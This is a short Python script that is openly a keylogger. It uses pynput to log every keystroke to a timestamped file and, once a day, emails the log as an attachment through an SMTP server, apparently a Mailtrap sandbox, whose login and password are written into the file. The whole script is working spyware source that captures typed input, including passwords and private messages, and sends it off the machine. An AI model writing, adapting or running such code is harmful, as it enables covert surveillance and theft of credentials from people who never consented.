from pynput.keyboard import Key, Listener
import logging
import datetime
from threading import Timer
import smtplib
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

#########################
port = 587
smtp_server = "sandbox.smtp.mailtrap.io"
login = "12946e39754614" # paste your login generated by Mailtrap
password = "4bd1ea7e7857b9" # paste your password generated by Mailtrap
subject = "keylogger"
sender_email = "mailtrap@example.com"
receiver_email = "aada3b967c-68ff7a@inbox.mailtrap.io"
#########################

# Copy-Pasted from SMTP competition
def sendEmail(filename):
    message = MIMEMultipart()
    message["From"] = sender_email
    message["To"] = receiver_email
    message["Subject"] = subject
    body = "keylogger file attached"
    message.attach(MIMEText(body, "plain"))
    # We assume that the file is in the directory where you run your Python script from
    with open(filename, "rb") as attachment:
        # The content type "application/octet-stream" means that a MIME attachment is a binary file
        part = MIMEBase("application", "octet-stream")
        part.set_payload(attachment.read())
    
    # Encode to base64
    encoders.encode_base64(part)
    
    # Add header
    part.add_header(
        "Content-Disposition",
        f"attachment; filename= {filename}",
    )
    
    # Add attachment to your message and convert it to string
    message.attach(part)
    text = message.as_string()
    
    # send your email
    with smtplib.SMTP("sandbox.smtp.mailtrap.io", 587) as server:
        server.login(login, password)
        server.sendmail(sender_email, receiver_email, text)
    print('Sent')


print('RUNNING')
log_filename = 'logfile_' + str(datetime.datetime.now()) + '.txt'
logging.basicConfig(force = True, filename=(log_filename), level=logging.DEBUG, format=" %(asctime)s - %(message)s")

def send():
    global log_filename
    sendEmail(log_filename)
    log_filename = 'logfile_' + str(datetime.datetime.now()) + '.txt'
    print('started logging at ' + str(datetime.datetime.now()))
    logging.basicConfig(force = True, filename=(log_filename), level=logging.DEBUG, format=" %(asctime)s - %(message)s")

def on_press(key):
    logging.info(str(key))

while True:
    with Listener(on_press=on_press) as listener:
        Timer(60*60*24, listener.stop).start()
        listener.join()
        send()
